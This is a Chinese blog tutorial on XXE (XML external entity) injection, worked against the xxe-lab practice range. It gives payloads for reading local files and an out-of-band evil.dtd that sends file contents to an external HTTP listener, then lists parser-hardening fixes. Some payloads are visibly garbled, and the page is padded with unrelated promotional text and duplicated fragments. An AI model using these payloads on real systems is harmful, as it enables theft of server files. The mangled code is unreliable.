Web安全之XXE漏洞_x-requested-with xmlhttprequest,网络安全性能优化之启动优化实战篇

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

<!ENTITY copyright SYSTEM "http://www.runoob.com/entities.dtd">

XML 实例:
&writer;&copyright;



### 


## 二、环境下载


xxe-lab:[https://github.com/c0ny1/xxe-lab](https://github.com/c0ny1/xxe-lab "https://github.com/c0ny1/xxe-lab")


pikachu:https://github.com/zhuifengshaonianhanlu/pikachu



## 三、漏洞利用


### 3.1、XXE漏洞判断


一般看见这样的,就可能存在 XML 外部实体注入即 XXE。



//文件类型为 XML
Content-Type: application/xml;charset=utf-8

//请求头含有XML
X-Requested-With: XMLHttpRequest

//包括数据包中的数据可能是如下的这种形式,都可以进行一个判断
admin123


![](https://img-blog.csdnimg.cn/80d1ba39ada74b788177b90759e4cae5.png)



### 3.2、有回显XXE


访问 XXE-Lab 的 PHP 环境靶场:[http://127.0.0.1/xxe-lab/php\_xxe/]( )


![](https://img-blog.csdnimg.cn/35f60a67e3fa4db98138960536eb5bd8.png)


 随便输入个账号木马然后点击登录进行抓包。


![](https://img-blog.csdnimg.cn/d25393a87f93439fb8b8b960327a8c6f.png)


将数据包发送到 Repeater 模块,构造 Payload 读取 win.ini 文件。



<?xml version="1.0"?>

]>
&xxe;123


![](https://img-blog.csdnimg.cn/0a83c3f637494dc9b553851c314541aa.png)


 接着再本地随便一个盘符创建一个 xml\_test.txt 文件内容为:



, <, &, ', "flag{asdavghagdhjagsdhjas}


 尝试对取这个 txt 文本。



<?xml version="1.0"?>

]>
&xxe;123


![](https://img-blog.csdnimg.cn/7df0b8611c894e95bae6dbe5c5c0615a.png)


直接报错了,因为我们的文档里含有一些特殊符号 XML 中不允许出现特殊符号。


当读取的数据存在特殊符号的时候,我们可以用 <![CDATA[...]]>。


首先在自己的本地或 vps 上的 Web 目录创建一个 dtd 文件,内容如下:



<!ENTITY all "%start;%xxe;%end;">

然后构造 Payload 读取 txt 文本内容。



<?xml version="1.0" encoding="utf-8"?> <!ENTITY % xxe SYSTEM "file:///F:/xml_test.txt"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://ip/evil.dtd">

%dtd; ]>

&all;123


![](https://img-blog.csdnimg.cn/a67a9186964f493f929d4f8e78cd8928.png)



### 3.3、无回显XXE


#### 3.3.1、无回显XXE环境搭建


找了好多个靶场都没有无回显的 XXE 这里我们还是用 XXE-Lab,不过得修改文件内容到时改回来就好了。


修改 doLogin.php 文件,把报错和输出都关掉。


![](https://img-blog.csdnimg.cn/eef279e4829141cd894edbf94f194d19.png)


 把这个 echo 输出语句给注释掉就好了。


![](https://img-blog.csdnimg.cn/6e2db988111c4c02ae495d9ebe7763f3.png)


然后验证一下看看还有没有回显。



<?xml version="1.0"?>

]>
&xxe;123


![](https://img-blog.csdnimg.cn/8d040d1a9d4f483b918e2e635e9f1f11.png)


 可以看到回显没有了,到这无回显环境就搭建好了。



#### 3.3.2、无回显XXE利用方法


这里为了还原实战真实场景就使用了公网,如果是本地测试内网即可。


**环境描述**


公网 IP:172.26.147.94


靶机 IP:192.168.0.77


**漏洞利用**


首先需要公网上搭建一个 Web 用于接收回显数据的,这里直接使用 Python3 开启 HTTP 服务。



python -m http.server 9999


![](https://img-blog.csdnimg.cn/4ea44fcbe0df4833a1c66efe16d5d744.png)


接着在当前开启 http 的目录下创建 evil.dtd 文件。


**注:**你上面那条命令在哪敲的,这个 dtd 文件就在那个位置创建,这里 evil.dtd 中 send 前面百分号要进行 html 实体编码,因为实体的值中不能出现 %。



<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://172.26.147.94:9999?content=%file;'>">

![](https://img-blog.csdnimg.cn/03913765335642bdbc9ad7e87e9767cc.png)


访问靶场 XXE-Lab 环境。


![](https://img-blog.csdnimg.cn/33436ae8003b4ed5b14328440307e10d.png)


随便输入个账号和密码,然后利用 Burp 抓取登录包接着发送到 Repeater 模块。


![](https://img-blog.csdnimg.cn/41304cec8b274c84b9faefff8ae636db.png)


构造 Payload 将数据回显到我们公网的 Web 服务器上。


![](https://img-blog.csdnimg.cn/676d8ad628a340138c35d1aafe478149.png)


回到公网服务器上查看日志,content= 后的内容就是 C:/Windows/win.ini 的文件内容 


![](https://img-blog.csdnimg.cn/f9d73e00d8b34e5697593322409fe60a.png)


 对内容进行 base64 解密,这里使用 Hacker 解密。


![](https://img-blog.csdnimg.cn/37c040651c7f4395a19533d2d6b7ae62.png)



## 四、防御手段


* 检查服务器是否必须对 XML 进行解析。
* 检查服务器是否必须将解析的内容加载到页面或数据库。
* 检查服务器是否对 XML 文件头进行检查。
* 禁用外部实体


PHP 禁用外部实体:



libxml_disable_entity_loader(true);


JAVA 禁用外部实体:



DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);


Python 禁用外部实体:



from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))




### 给大家的福利


**零基础入门**


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限,仅展示部分资料


网络安全面试题


![](https://img-blog.csdnimg.cn/img_convert/80674985176a4889f7bb130756893764.png)


绿盟护网行动


![](https://img-blog.csdnimg.cn/img_convert/9f3395407120bb0e1b5bf17bb6b6c743.png)


还有大家最喜欢的黑客技术


![](https://img-blog.csdnimg.cn/img_convert/5912337446dee53639406fead3d3f03c.jpeg)


**网络安全源码合集+工具包**


![](https://img-blog.csdnimg.cn/img_convert/5072ce807750c7ec721c2501c29cb7d5.png)


![](https://img-blog.csdnimg.cn/img_convert/4a5f4281817dc4613353c120c9543810.png)

**所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
![img](https://img-blog.csdnimg.cn/img_convert/105d4a7b99dd6a1df4588e22b8ce0130.png)

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

3353c120c9543810.png)

**所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
[外链图片转存中...(img-T3OgJ6RC-1713185727842)]

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 23
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还可以通过XXE漏洞发起钓鱼攻击或者是向系统发送恶意的请求来进一步导致系统的安全漏洞。 为了防范泛微OA的XXE漏洞,建议以下几点: 1. 进行安全审计:对泛微OA系统进行定期的安全审计,通过检测系统中的漏洞和弱点,及时修复存在的XXE漏洞。 2. 模板限制:在处理外部XML实体时,应限制或阻止对外部实体的解析,避免可能的XXE攻击。可以通过设置合适的解析选项,限制对外部实体的访问权限。 3. 输入验证与过滤:对于用户输入的数据,应进行合理的验证和过滤,确保输入的内容符合预期格式,避免恶意的外部实体注入。 4. 更新补丁:定期保持泛微OA系统的更新与升级,及时安装官方发布的补丁和修复漏洞的版本。 5. 安全意识培训:加强企业员工的安全意识培训,提高他们对XXE漏洞及其他安全威胁的认识,避免因无意中点击恶意链接或下载恶意附件而导致漏洞的利用。 通过以上措施,可以有效地减少泛微OA中的XXE漏洞,提升系统的安全性。及早识别并修复漏洞,有助于保护企业的机密信息以及防止潜在的安全威胁发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值